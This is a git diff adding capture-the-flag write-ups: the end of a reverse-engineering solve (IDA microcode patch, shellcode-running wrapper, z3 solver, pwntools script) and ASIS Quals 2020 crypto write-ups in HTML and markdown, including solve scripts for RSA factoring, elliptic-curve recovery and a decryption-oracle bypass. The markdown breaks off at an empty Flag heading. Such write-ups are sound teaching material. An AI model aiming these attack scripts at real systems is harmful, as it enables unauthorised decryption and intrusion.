+ chain_logger.info("Found debugbreak at 0x%x", ins.ea)
+ new_insn = minsn_t(ins.ea)
+ new_insn.opcode = m_xor
+ new_insn.l.make_gvar(0xdead0000)
+ new_insn.l.size = 4
+ new_insn.r.make_number(0xdeadbeef, 4)
+ new_insn.d.make_gvar(0xdead0000)
+ new_insn.d.size = 4
+ return new_insn
+
+ return super().check_and_replace(blk, ins)
+```
+
+I was not expecting that much, but after hitting F5 (and waiting like 2 minutes):
+
+```c
+__int64 __fastcall sub_0(__int64 a1)
+{
+ __int64 result; // rax
+
+ dword_DEAD0000 = 0xDEADBEE0;
+ *(_DWORD *)a1 = 0x2B106BC4;
+ result = a1 + 4;
+ *(_DWORD *)(a1 + 4) = 0x750E24C4;
+ return result;
+}
+```
+
+And then I realized, oh our input is constant and hence this just sets our input to the constants seen above. My teammate wrote a quick binary, that mmaps the unpacked shellcode, runs the sub_0 function and prints the resulting values:
+
+```c
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+static int* const deadpage = (void*)0xdead0000;
+
+void handler(int sig) {
+ *deadpage ^= 0xdeadbeef;
+}
+
+int main(int argc, char** argv) {
+ if (argc != 2) {
+ errx(EX_USAGE, "usage: %s ", argv[0]);
+ }
+
+ int fd = open(argv[1], O_RDONLY);
+ if (fd < 0) {
+ err(EX_NOINPUT, "couldn't open file");
+ }
+
+ void *mem = mmap(NULL, 0x100000, PROT_READ | PROT_EXEC, MAP_FILE | MAP_PRIVATE, fd, 0);
+ if (mem == MAP_FAILED) {
+ err(EX_OSERR, "couldn't map file");
+ }
+
+ void *deadmapping = mmap(deadpage, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
+ if (deadmapping == MAP_FAILED) {
+ err(EX_OSERR, "couldn't map 0xdead....");
+ }
+ if (deadmapping != deadpage) {
+ // what is MAP_FIXED lol
+ errx(EX_OSERR, "couldn't actualy map 0xdead....");
+ }
+
+ if (signal(SIGTRAP, handler) != 0) {
+ err(EX_OSERR, "couldn't install signal handler");
+ }
+
+ int buf[2] = {0};
+ ((void(*)(int*))mem)(buf);
+ printf("%08x %08x\n", buf[0], buf[1]);
+}
+```
+
+The final piece of the puzzle left, was function `sub_223F3`, which actually does something with our input. Fortunately, it seems it was exactly the same for every binary. I translated it into z3 and was able to solve for our input (after wasting some time debugging why it wasn't working, because I mistyped v1 as v4):
+
+```python
+import z3
+from pwn import *
+
+def hiword(val):
+ return z3.Extract(31, 16, val)
+
+def loword(val):
+ return z3.Extract(15, 0, val)
+
+def toint(val):
+ num = val.size()
+ if num == 32:
+ return val
+ return z3.ZeroExt(32-num, val)
+
+def thingy(a, b, cond, c):
+ return z3.If(cond != 0,
+ toint(a) - toint(b) - (z3.LShR(toint(a) - toint(b), 16)),
+ toint(c)
+ )
+
+def wtf(num):
+ x = z3.BitVecVal(num, 32)
+ res = z3.simplify(toint(loword(x)) - toint(hiword(x)) - (z3.LShR(toint(loword(x)) - toint(hiword(x)), 16)))
+ return res.as_long()
+
+def do_solve(t1, t2):
+ inp = []
+ for i in range(2):
+ inp.append(z3.BitVec(f'inp_{i}', 32))
+ a1 = inp
+ v1 = a1[1]
+ v2 = 7 * toint(hiword(a1[0]))
+ v3 = thingy(loword(v2), hiword(v2), v2, -6 - toint(hiword(a1[0])))
+ v4 = a1[0] + 6
+ v5 = toint(hiword(v1)) + 5
+ v6 = toint(4 * toint(loword(v1)))
+
+ v1 = thingy(loword(v6), hiword(v6), v6, -3 - toint(loword(v1)))
+
+ v7 = toint(3 * toint(loword(v3 ^ v5)))
+ v8 = thingy(loword(v7), hiword(v7), v7, -3 - toint(loword(v3 ^ v5)))
+
+ v9 = toint(loword(v8 + (v1 ^ v4)))
+ r1 = loword(2*v9)
+ r2 = loword(z3.LShR(toint(2*v9), 16))
+ v10 = thingy(r1, r2, 2*v9, ~v9)
+ s = z3.Solver()
+ res1 = (z3.ZeroExt(16, loword(v5 ^ v10)) | ((v10 ^ v3) << 16))
+ res2 = ((toint(loword((v10 + v8) ^ v1))) | (((v10 + v8) ^ v4) << 16))
+ s.assert_and_track(t1 == res1, "res1")
+ s.assert_and_track(t2 == res2, "res2")
+ assert s.check() == z3.sat
+ m = s.model()
+ nums = [m.eval(i).as_long() for i in inp]
+ in_val = b""
+ for num in nums:
+ in_val += p32(num)
+ return in_val
+```
+
+With all of that done, we can now write our exploit script and get the flag :):
+
+```python
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template --host 111.186.58.164 --port 30212
+from pwn import *
+from hashlib import sha256
+from itertools import product
+import re
+from pwnlib.tubes.tube import tube
+# import pow
+
+# Set up pwntools for the correct architecture
+context.update(arch='i386')
+exe = './path/to/binary'
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+# ./exploit.py GDB HOST=example.com PORT=4141
+host = args.HOST or '111.186.58.164'
+port = int(args.PORT or 30212)
+
+def local(argv=[], *a, **kw):
+ '''Execute the target binary locally'''
+ if args.GDB:
+ return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+ else:
+ return process([exe] + argv, *a, **kw)
+
+def remote(argv=[], *a, **kw):
+ '''Connect to the process on the remote host'''
+ io = connect(host, port)
+ if args.GDB:
+ gdb.attach(io, gdbscript=gdbscript)
+ return io
+
+def start(argv=[], *a, **kw):
+ '''Start the exploit against the target.'''
+ if args.LOCAL:
+ return local(argv, *a, **kw)
+ else:
+ return remote(argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+
+def solve_proof_of_work(hashable_suffix, hash) :
+ alphabet = (string.ascii_letters + string.digits + '!#$%&*-?')
+ for hashable_prefix in product(alphabet, repeat=4) :
+ current_hash_in_hex = sha256((''.join(hashable_prefix) + hashable_suffix).encode()).hexdigest()
+ if current_hash_in_hex == hash :
+ return ''.join(hashable_prefix)
+
+
+io = start()
+
+proof_of_work_line = io.recvline(keepends=False).decode("utf-8")
+io.recvline()
+hashable_suffix = re.search('sha256\(XXXX\+(.*)\) ==', proof_of_work_line).group(1)
+hash = re.search('== (.*)', proof_of_work_line).group(1)
+log.info("Solving POW %s for %s", hashable_suffix, hash)
+proof = solve_proof_of_work(hashable_suffix, hash)
+io.sendline(proof)
+io: tube
+
+import base64
+
+def read_challenge():
+ io.readuntil("Here is your challenge:")
+ # swallow 2 newlines
+ io.recvline()
+ io.recvline()
+ challenge = io.recvline()
+ return base64.b64decode(challenge)
+
+for i in range(3):
+
+ log.info("Downloading challenge %d", i)
+ chal1 = read_challenge()
+ with open(f"chal{i}", "wb") as f:
+ f.write(chal1)
+
+ import unpack
+ log.info("Unpacking challenge")
+ unpacked = unpack.unpack(chal1)
+
+ with open(f"chal{i}_unpacked", "wb") as f:
+ f.write(unpacked)
+
+ log.info("Running wrapper")
+ p = process(["./wrapper", f"chal{i}_unpacked"])
+ res1 = p.readuntil(" ")
+ res1 = int(res1, 16)
+ res2 = p.readuntil("\n")
+ res2 = int(res2, 16)
+
+ log.info("Targets: 0x%x, 0x%x", res1, res2)
+
+ import do_solve
+ sender = do_solve.do_solve(res1, res2)
+
+ io.send(sender)
+
+io.interactive()
+```
+
+[^1]: For some reason I tried making a fast GPU based POW solver, turns out it's slower than just python hashlib :face_palm:
+
+[^2]: This was probably for other reasons, angr did manage to work later on.
diff --git a/ASIS-Quals-2020/index.html b/ASIS-Quals-2020/index.html
new file mode 100755
index 0000000..2ef0b85
--- /dev/null
+++ b/ASIS-Quals-2020/index.html
@@ -0,0 +1,1059 @@
+
+
+
+
+
+ASIS Quals 2020 | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
A handful of write ups from some of the crypto challenges from ASIS 2020 Quals. Thanks to Aurel, Hrpr and Hyperreality for the tips while solving these. Cr0wn came 16th overall, and I learnt that I really need to get to grips with multivariate polynomials because Tripolar was solved by a bunch of teams and I just couldn’t crack it…
The value of r is of small size r = random.randint(12, 19) and we also $e - 1 = 2^{16}$. We can understand $m = \frac{1-e}{2^r}$ as a power of two. The actual value of $m$ isn’t needed, as we can simply expand out $t_p^e$ and write down
+
+\[\begin{align}
+t_p^e - 1 = s p \cdot (s^{m-1} p^{m-1} + \ldots + m) \mod n \\
+\end{align}\]
+
+
We see that $N$ and $t_p^e$ share a common factor of $p$, and we can solve the challenge from
+
+\[\gcd(t_p^e - 1, n) = p\]
+
+
Note: we can only treat $p$ as a true factor in the above line as $n = p\cdot q$, so by nature of the CRT, this expression simplifies.
The hard part of this challenge was dealing with boring bugs when sending data to the server while resolving the proof of work. One you connected to the server and passed the proof of work, we were given the prompt
+
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ hi! There are three integer points such that (x, y), (x+1, y), and +
++ (x+2, y) lies on the elliptic curve E. You are given one of them!! +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+| One of such points is: P = (68363894779467582714652102427890913001389987838216664654831170787294073636806, 48221249755015813573951848125928690100802610633961853882377560135375755871325)
+| Send the 37362287180362244417594168824436870719110262096489675495103813883375162938303 * P :
+
+
+
So the question is, given a single point $P$, together with the knowledge of the placement of three points, can we uniquely determine the curve?
+
+
If we assume the curve is over some finite field with prime characteristic, and that as standard this challenge uses a curve of Weierstrass form, we know we are looking for curves of the form
+
+\[y^2 = x^3 + Ax + B \mod p\]
+
+
and from the knowledge of the three points we have
+
+\[x^3 + Ax + B = (x+ 1)^3 + A(x+1) + B = (x + 2)^3 + A(x + 2) + B \mod p\]
+
+
and from the above we have $x = -1 \Rightarrow A = -1$. The only thing left to do is to find $B$, which we can see is recovered from the general form of the curve.
Now we have recovered the inital point, we see that the triple of points we will be given is $(-1, y)$, $(0, y)$ and $(1,y)$. The last two of these points would be trivial to spot and we can see this isn’t what the server is sending us. We can then know for certain that the given point
With everything now understood, we can take the point given by the server, together with the given scale factor, computer the scalar multiplication and send the new point back to the server
+
+
Implmentation
+
+
importos
+os.environ["PWNLIB_NOTERM"]="True"
+
+importhashlib
+importstring
+importrandom
+frompwnimport*
+
+IP="76.74.178.201"
+PORT=9531
+r=remote(IP,PORT,level="debug")
+POW=r.recvline().decode().split()
+x_len=int(POW[-1])
+suffix=POW[-5]
+hash_type=POW[-7].split('(')[0]
+
+"""
+The server asks for a random length string, hashed with a random hash
+function such that the last 3 bytes of the hash match a given prefix.
+"""
+whileTrue:
+ X=''.join(random.choices(string.ascii_letters+string.digits,k=x_len))
+ h=getattr(hashlib,hash_type)(X.encode()).hexdigest()
+ ifh.endswith(suffix):
+ print(h)
+ break
+
+r.sendline(X)
+
+header=r.recvuntil(b'One of such points')
+
+points=r.recvline().split(b'P = (')[-1]
+points=points.split(b', ')
+px=Integer(points[0])
+py=Integer(points[-1][:-2])
+
+scale_data=r.recvline().split(b' ')
+scale=Integer(scale_data[3])
+
+p=px+1
+assertp.is_prime()
+a=-1
+b=(py^2-px^3-a*px)%p
+E=EllipticCurve(GF(p),[a,b])
+P=E(px,py)
+
+Q=P*scale
+
+"""
+For some reason sending str(Q.xy()) to the server caused an error, so I
+just switched to interactive and sent it myself. I'm sure it's a dumb
+formatting bug, but with the annoying POW to deal with, I can't be bothered
+to figure it out...
+"""
+# r.sendline(str(Q.xy()))
+print(Q.xy())
+r.interactive()
+
Which for reasons below, I will now refer to as the modulus $n$. Sending the option F, we get the encryption of the flag, again with pubkey as a label, but from the encryption function, we know that this value is (or at least should be $s_{t+1} = s_t^2 \mod n$). Not sure why ASIS chose this confusing notation…
Lastly sending the option D we are given the prompt
+
+
| send an pair of integers, like (c, x), that you want to decrypt:
+
+
+
Being a wise guy, I tried sending the flag back to the server, but I was given the message
+
+
| this decryption is NOT allowed :P
+
+
+
Solving this challenge was easy after a bit of googling to try and see what this crypto system was. I noticed that the key stream was generated using a random number generator called Blum Blum Shub. Looking for when this was used as a keystream, I stumbled upon the Blum-Goldwasser Cryptosystem and spending a little bit of time reading the Wikipedia page, I could tell that this was the right choice.
+
+
Adaptive chosen plaintext attack
+
+
Reading more closely, I spotted that the BG implementation is insecure against adaptive plaintext attacks when the attacker has access to a decryption oracle. This sounds great!!
+
+
The idea is that to decrypt some ciphertext $(\vec{c}, s)$, one can pick a generic ciphertext using the same seed $(\vec{a}, s)$ and then use the decryption oracle to find $m^\prime$. As the seed is the same, both $m^\prime$ and the flag $m$ have been encrypted with the same keystream and we can obtain the flag from $m = \vec{a} \oplus \vec{c} \oplus m^\prime$.
+
+
This sounds easy! Lets go back to the server and generate $m^\prime$:
+
+
| send an pair of integers, like (c, x), that you want to decrypt:
+(513034390171324294434451277551689016606030017438707103869413492040051559571787250655384810990478248003042112532698503643742022419886333447600832984361864307529994477653561831340899157529404892382650382111633622198787716725365621822247147320745039924328861122790104611285962416151778910, 1488429745298868766638479271207330114843847244232531062732057594917937561200978102167607190725732075771987314708915658110913826837267872416736589249787656499672811179741037216221767195188188763324278766203100220955272045310661887176873118511588238035347274102755393142846007358843931007832981307675991623888190387664964320071868166680149108371223039154927112978353227095505341351970335798938829053506618617396788719737045747877570660359923455754974907719535747353389095579477082285353626562184714935217407624849113205466008323762523449378494051510623802481835958533728111537252943447196357323856242125790983614239733)
+| this decryption is NOT allowed :P
+
+
+
Uh oh… it seems that the server checks the seed value and doesn’t let us use this attack…
+
+
Just one more block
+
+
Okay, so if we can’t use the same $s$ as the flag encryption, and we can’t factor $n$ (waaaaaaay too big) what options do we have?
+
+
I dunno if this attack has a proper name, but I realised we could fool the server into decrypting the flag by adding a block to the end of the ciphertext. For every block that is encoded, the encryption protocol takes $s_i$ and calculates $s_{i+1} = s_i^2 \mod n$. As a result, if the ciphertext being decoded was exactly one block longer, then the seed value we would supply to the oracle wouldn’t be $s$, but rather $s^2 \mod n$.
+
+
As we know ct, s, n we control enough data to solve the challenge, assuming that the server doesn’t tell us off for sending $s^2 \mod n$…
+
+
So, this should bypass the seed check in the oracle and allow us to decrypt the flag. All we need to do is take the pair (ct, s) from the server, together with the modulus n , add h bits to the end of ct and square s. Sending this to the oracle will decrypt our ciphertext block by block, we can finally remove the last h bits (which will have decoded to garbage) and grab the flag.
Using the data collected above. Sending our slightly longer flag to the server gives us a decrypted message:
+
+
(1050694431070872155001756216425859106009149475714472148724558831698025594003020289342228092908499451910230246466966535462383661915927210900686505951973098101821428690234494630586161474620221219599667982564625658263117243853548793491962157712885841765025507579474134243913651028278843209727, 3216641374118298063210229377328115445643813442578456023987769065661762517695051834586452075939576983800791011462122765510295327568646398522659752628912802933208909111321539625480585977865621874640928715606628766855738533853630742505790835948213775188951805695531626048779789826277990208281243968206104294503971898862963118207505455918079294280929081526755227996190831742555093366364879064928874861060462753403017976763786404530509469825731935018035684983539175758425557263211403465858234005521025395515018046387350089113701767863479780051534190944394815574406100307489105693633714510667995574063150674428700480235811)
+| the decrypted message is: 47771147116374265884489633343424974277884840496243413677482329815315049691915267634281287751924271959635398604756191897221446400520109091655450373658402419482516535670630080915290670126420548875478840451816545566711178369563850274167871301020132981380671014536902778264305709989256317962
+
+
+
Then we can simply grab the flag after chopping off 11 bits
+
+
>>>fromCrypto.Util.numberimportlong_to_bytes
+>>>flag_ext=47771147116374265884489633343424974277884840496243413677482329815315049691915267634281287751924271959635398604756191897221446400520109091655450373658402419482516535670630080915290670126420548875478840451816545566711178369563850274167871301020132981380671014536902778264305709989256317962
+>>>flag_bin=bin(flag_ext)[2:-11]
+>>>flag_int=int(flag_bin,2)
+>>>flag=long_to_bytes(flag_int)
+>>>print(flag)
+b'((((......:::::: Great! the flag is: ASIS{BlUM_G0ldwaS53R_cryptOsySt3M_Iz_HI9hlY_vUlNEr4bl3_70_CCA!?} ::::::......))))'
+
+
+
No pwntools cracked out to do this one in a stylish way, but we still grab the flag!
After solving Jazzy there’s not much to this challenge. We know that it is an implementation of Blum-Goldwasser (albeit with an additional xorkey). Blum-Goldwasser’s security relies on the hardness of factoring $n = p\cdot q$ and so our best chance to solve this puzzle is to find the factors of the pubkey.
+
+
Looking at the challenge, we see we are given many many instances of the encryption. With all of these public keys, wouldn’t it be a shame if some of them shared a factor?
+
+
Putting the data into an array, I checked for common factors using gcd in the following way:
With the crypto system all sorted out and checked against the encryption function (without the xorkey) we just need to find a way to do this last step. I started trying to think of a clever way to undo the xor with knowledge of several ct / msg pairs (many of the public keys share common factors) but then i realised that the block size is only 10 bits long and a brute force of xorkey would only mean guessing 1024 values.
+
+
So, i took the easy way and included a loop inside my decrypt trying all values for the xorkey and storing any decryptions that had the flag format: ASIS{. The script takes seconds and finds the flag.
Disclaimer I didn’t solve this challenge during the competition and it took me reading a writeup to understand how this challenge works. I’m writing it up to talk myself through the solution, and maybe someone else will read this and be surprised by the solution too.
+
+
After working through this, my take away is that my intuition for cube roots was way off! The key for solving this challenge is that given a polynomial of the form
+
+\[f(x, y, z) = x^3 + y^2 + z\]
+
+
One can recover the value of $x$ from taking the cube root of $f(x,y,z)$. Even after I read this, I couldn’t believe there wasn’t some loss of information of the LSB of $x$, but it seems like it holds, even for small positive integers
The same is true for quadratic terms, by looking at the square root of $f - x^3$, but here there seems to be a bit less certainty and we find with small enough inputs, the square root approximation can be off by 1.
+
+
Anyway… with my display of ignorance out the way, lets look at the challenge!
Reading through the code, we see that the flag is encrypted RSA style using three primes $p,q,r$. The message is also hashed with sha1 and the three primes used for encryption are fed into some fairly ugly polynomial named crow to produce another value pk.
+
+
The results of these computations are then all taken together, multiplied to and fed into the crow function again. The only output of the challenge is enc, which is the value of the second evaluation of the crow polynomial.
+
+
We then understand this challenge as learning how to find the integer solutions of crow so we can work backwards to finding the flag. Solving the first step will give us _enc, _hash and pk and solving pk = crow(p,q,r) we can grab the primes and reverse the encryption of _enc. But how to we solve crow?
+
+
During the competition I got toally sidetracked by the paper A Strategy for Finding Roots of Multivariate Polynomials with New Applications in Attacking RSA Variants by Jochemsz and May, and decided the solution to this puzzle must be to implement the small integer roots algorithm that they give in 2.2 of the paper. This was hard to specialise to this polynomial and i failed. Potentially this method works, but I couldnt get it to. The closest I got was to notice that the bitsize of _enc*pk was larger than the other two elements of crow and so by taking the cube root, I could recover the MSB of _enc*pk. Typing this up now I see i was kind of close, but thinking totally wrong.
+
+
The real solution is much simplier and elegant and relies on the fact that we can find certain terms in the polynomial due to the various powers of certain terms (I’ve already explained this a little in the disclaimer). What we find is with a few steps of algebra and a resetting of my intuition of cube roots, this challenge has a nice solution.
+
+
Solution
+
+
The first step to solving this challenge is simplifying the polynomial. I went down a rabbit hole of Legendre polynomials, taking the “dipole” hint way too seriously. Im not sure what the “Tripolar” hint was pointing towards… maybe some can enlighten me.
This is a big mess, but we can notice that the coefficient for all cubic terms is $1$ (ignoring the overall factor of a sixth) and we can start to piece together simple parts of this expression until we obtain
+
+\[C(x,y,z) = \frac16 \left((x + y + z + 1 )^3 + 3(x + y + 1)^2 + 2(x + y + 1) - 6y - z - 6 \right)\]
+
+
This is looking better, and by renaming a few pieces we get the polynomial into the form
+
+\[f(x,y,z) = x + y + z + 1 \qquad h(x,y) = x + y + 1\]
+
+
We now see how the disclaimer discussed above is going to help us. By taking the cube root of enc, we will recover the value for $f(x,y,z)$! Following this, we know that
+
+\[6 C - f^3 = 3h^2 + 2h - 6y - z - 6,\]
+
+
and by the same approximation, the square root of the left hand side will be a good approximation for $h$. Note for the second time we solve crow with the smaller inputs of the three primes, we will find this approximation is off by one, which can be spotted by either making mistakes, or trying out this step with some known values of $p,q,r$.
+
+
With knowledge of both $f(x,y,z)$ and $h(x,y)$, we can recover the input values from the three expressions
+
+\[\begin{align}
+z &= f - h \\
+y &= -\frac16 \left( 6C - f^3 - 3h^2 - 2h + z + 6\right) \\
+x &= h - y - 1
+\end{align}\]
+
+
With the triple $(x,y,z)$ from crow we can find the input parameters from the gcd of the inputs:
+
+
+
+
+
+
+
diff --git a/ASIS-Quals-2020/readme.md b/ASIS-Quals-2020/readme.md
new file mode 100755
index 0000000..b1bdc13
--- /dev/null
+++ b/ASIS-Quals-2020/readme.md
@@ -0,0 +1,927 @@
+# ASIS Quals 2020
+
+A handful of write ups from some of the crypto challenges from ASIS 2020 Quals. Thanks to Aurel, Hrpr and Hyperreality for the tips while solving these. Cr0wn came 16th overall, and I learnt that I really need to get to grips with multivariate polynomials because Tripolar was solved by a bunch of teams and I just couldn't crack it...
+
+
+## Contents
+
+| Challenge | Points |
+| --------------------------------- | -----: |
+| [Baby RSA](#baby-rsa) | 60 |
+| [Elliptic Curve](#elliptic-curve) | 125 |
+| [Jazzy](#jazzy) | 122 |
+| [Crazy](#crazy) | 154 |
+| [Tripolar](#tripolar) | 154 |
+
+
+
+## Baby RSA
+
+> All babies love [RSA](https://asisctf.com/tasks/baby_rsa_704000e3703726346fa621a91a9f8097a9307929.txz). How about you? 😂
+
+
+#### Challenge
+
+```python
+#!/usr/bin/python
+
+from Crypto.Util.number import *
+import random
+from flag import flag
+
+nbit = 512
+while True:
+ p = getPrime(nbit)
+ q = getPrime(nbit)
+ e, n = 65537, p*q
+ phi = (p-1)*(q-1)
+ d = inverse(e, phi)
+ r = random.randint(12, 19)
+ if (d-1) % (1 << r) == 0:
+ break
+
+s, t = random.randint(1, min(p, q)), random.randint(1, min(p, q))
+t_p = pow(s*p + 1, (d-1)/(1 << r), n)
+t_q = pow(t*q + 4, (d-1)/(1 << r), n)
+
+print 'n =', n
+print 't_p =', t_p
+print 't_q =', t_q
+print 'enc =', pow(bytes_to_long(flag), e, n)
+```
+
+
+
+#### Solution
+
+To solve this challenge, we use that for the RSA cryptosystem the public and private keys obey
+
+$$
+e\cdot d - 1 \equiv 0 \mod \phi(n), \qquad \Rightarrow \qquad e\cdot d - 1 = k \cdot \phi(n), \quad k \in \mathbf{Z}
+$$
+
+and Euler's theorem, which states that
+
+$$
+\gcd(a,n) = 1 \qquad \Leftrightarrow \qquad a^{\phi(n)} \equiv 1\mod n
+$$
+
+We have the data $t_p, t_q, e, n$ which is suffient to solve for $p$. Using that
+
+$$
+t_p = (sp + 1)^{\frac{d-1}{2^r}}
+$$
+
+We can take `eth` power to find
+
+$$
+\begin{align}
+t_p^e &= (sp + 1)^{\frac{ed-e}{2^r}} \mod n \\
+&= (sp + 1)^{\frac{k\phi(n) + 1 -e}{2^r}} \mod n \\
+&= (sp + 1)^{\frac{k\phi(n)}{2^r}} (sp + 1)^{\frac{1-e}{2^r}} \mod n
+\end{align}
+$$
+
+From Euler's theorem we have
+
+$$
+(sp + 1)^{\frac{k\phi(n)}{2^r}} \equiv 1^{\frac{k}{2^r}} \equiv 1 \mod n
+$$
+
+The value of `r` is of small size `r = random.randint(12, 19)` and we also $e - 1 = 2^{16}$. We can understand $m = \frac{1-e}{2^r}$ as a power of two. The actual value of $m$ isn't needed, as we can simply expand out $t_p^e$ and write down
+
+$$
+\begin{align}
+t_p^e - 1 = s p \cdot (s^{m-1} p^{m-1} + \ldots + m) \mod n \\
+\end{align}
+$$
+
+We see that $N$ and $t_p^e$ share a common factor of $p$, and we can solve the challenge from
+
+$$
+\gcd(t_p^e - 1, n) = p
+$$
+
+**Note**: we can only treat $p$ as a true factor in the above line as $n = p\cdot q$, so by nature of the CRT, this expression simplifies.
+
+#### Implementation
+
+```python
+import math
+from Crypto.Util.number import *
+
+n = 10594734342063566757448883321293669290587889620265586736339477212834603215495912433611144868846006156969270740855007264519632640641698642134252272607634933572167074297087706060885814882562940246513589425206930711731882822983635474686630558630207534121750609979878270286275038737837128131581881266426871686835017263726047271960106044197708707310947840827099436585066447299264829120559315794262731576114771746189786467883424574016648249716997628251427198814515283524719060137118861718653529700994985114658591731819116128152893001811343820147174516271545881541496467750752863683867477159692651266291345654483269128390649
+e = 65537
+t_p = 4519048305944870673996667250268978888991017018344606790335970757895844518537213438462551754870798014432500599516098452334333141083371363892434537397146761661356351987492551545141544282333284496356154689853566589087098714992334239545021777497521910627396112225599188792518283722610007089616240235553136331948312118820778466109157166814076918897321333302212037091468294236737664634236652872694643742513694231865411343972158511561161110552791654692064067926570244885476257516034078495033460959374008589773105321047878659565315394819180209475120634087455397672140885519817817257776910144945634993354823069305663576529148
+t_q = 4223555135826151977468024279774194480800715262404098289320039500346723919877497179817129350823600662852132753483649104908356177392498638581546631861434234853762982271617144142856310134474982641587194459504721444158968027785611189945247212188754878851655525470022211101581388965272172510931958506487803857506055606348311364630088719304677522811373637015860200879231944374131649311811899458517619132770984593620802230131001429508873143491237281184088018483168411150471501405713386021109286000921074215502701541654045498583231623256365217713761284163181132635382837375055449383413664576886036963978338681516186909796419
+enc = 5548605244436176056181226780712792626658031554693210613227037883659685322461405771085980865371756818537836556724405699867834352918413810459894692455739712787293493925926704951363016528075548052788176859617001319579989667391737106534619373230550539705242471496840327096240228287029720859133747702679648464160040864448646353875953946451194177148020357408296263967558099653116183721335233575474288724063742809047676165474538954797346185329962114447585306058828989433687341976816521575673147671067412234404782485540629504019524293885245673723057009189296634321892220944915880530683285446919795527111871615036653620565630
+
+p = math.gcd(n, pow(t_p, e, n) - 1)
+q = n // p
+phi = (p-1)*(q-1)
+d = inverse(e, phi)
+flag = pow(enc,d,n)
+print(long_to_bytes(flag))
+# b'ASIS{baby___RSA___f0r_W4rM_uP}'
+```
+
+#### Flag
+
+`b'ASIS{baby___RSA___f0r_W4rM_uP}'`
+
+
+
+## Elliptic Curve
+
+### Challenge
+
+> Are all elliptic curves smooth and projective?
+>
+> ```
+> nc 76.74.178.201 9531
+> ```
+
+### Solution
+
+The hard part of this challenge was dealing with boring bugs when sending data to the server while resolving the proof of work. One you connected to the server and passed the proof of work, we were given the prompt
+
+```
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ hi! There are three integer points such that (x, y), (x+1, y), and +
++ (x+2, y) lies on the elliptic curve E. You are given one of them!! +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+| One of such points is: P = (68363894779467582714652102427890913001389987838216664654831170787294073636806, 48221249755015813573951848125928690100802610633961853882377560135375755871325)
+| Send the 37362287180362244417594168824436870719110262096489675495103813883375162938303 * P :
+```
+
+So the question is, given a single point $P$, together with the knowledge of the placement of three points, can we uniquely determine the curve?
+
+If we assume the curve is over some finite field with prime characteristic, and that as standard this challenge uses a curve of Weierstrass form, we know we are looking for curves of the form
+
+$$
+y^2 = x^3 + Ax + B \mod p
+$$
+
+and from the knowledge of the three points we have
+
+$$
+x^3 + Ax + B = (x+ 1)^3 + A(x+1) + B = (x + 2)^3 + A(x + 2) + B \mod p
+$$
+
+We can then write down
+
+$$
+x^3 + Ax = (x+ 1)^3 + A(x+1), \quad \Rightarrow \quad A = -1 -3x - 3x^2
+$$
+
+and
+
+$$
+x^3 + Ax = (x+ 2)^3 + A(x+2), \quad \Rightarrow \quad A = -4 -6x - 3x^2
+$$
+
+as all three points are on the same curve, we have that
+
+$$
+3x^2 + 3x + 1 = 3x^2 +6x +4, \quad \Rightarrow \quad x = -1
+$$
+
+and from the above we have $x = -1 \Rightarrow A = -1$. The only thing left to do is to find $B$, which we can see is recovered from the general form of the curve.
+
+$$
+y^2 = (-1)^3 + (-1)^2 + B, \quad \Rightarrow \quad B = y^2
+$$
+
+Now we have recovered the inital point, we see that the triple of points we will be given is $(-1, y)$, $(0, y)$ and $(1,y)$. The last two of these points would be trivial to spot and we can see this isn't what the server is sending us. We can then know for certain that the given point
+
+```
+(68363894779467582714652102427890913001389987838216664654831170787294073636806, 48221249755015813573951848125928690100802610633961853882377560135375755871325)
+```
+
+is the point $(x_0, y_0) = (-1, y)$ . We can now recover the characteristic from
+
+$$
+-1 \equiv x_0 \mod p, \quad \Rightarrow \quad p = x_0 + 1
+$$
+
+and we can quickly check that
+
+```python
+sage: x0 = 68363894779467582714652102427890913001389987838216664654831170787294073636806
+sage: p = x0 + 1
+sage: print(p.is_prime())
+True
+```
+
+With everything now understood, we can take the point given by the server, together with the given scale factor, computer the scalar multiplication and send the new point back to the server
+
+### Implmentation
+
+```python
+import os
+os.environ["PWNLIB_NOTERM"] = "True"
+
+import hashlib
+import string
+import random
+from pwn import *
+
+IP = "76.74.178.201"
+PORT = 9531
+r = remote(IP, PORT, level="debug")
+POW = r.recvline().decode().split()
+x_len = int(POW[-1])
+suffix = POW[-5]
+hash_type = POW[-7].split('(')[0]
+
+"""
+The server asks for a random length string, hashed with a random hash
+function such that the last 3 bytes of the hash match a given prefix.
+"""
+while True:
+ X = ''.join(random.choices(string.ascii_letters + string.digits, k=x_len))
+ h = getattr(hashlib, hash_type)(X.encode()).hexdigest()
+ if h.endswith(suffix):
+ print(h)
+ break
+
+r.sendline(X)
+
+header = r.recvuntil(b'One of such points')
+
+points = r.recvline().split(b'P = (')[-1]
+points = points.split(b', ')
+px = Integer(points[0])
+py = Integer(points[-1][:-2])
+
+scale_data = r.recvline().split(b' ')
+scale = Integer(scale_data[3])
+
+p = px + 1
+assert p.is_prime()
+a = -1
+b = (py^2 - px^3 - a*px) % p
+E = EllipticCurve(GF(p), [a,b])
+P = E(px,py)
+
+Q = P*scale
+
+"""
+For some reason sending str(Q.xy()) to the server caused an error, so I
+just switched to interactive and sent it myself. I'm sure it's a dumb
+formatting bug, but with the annoying POW to deal with, I can't be bothered
+to figure it out...
+"""
+# r.sendline(str(Q.xy()))
+print(Q.xy())
+r.interactive()
+```
+
+#### Flag
+
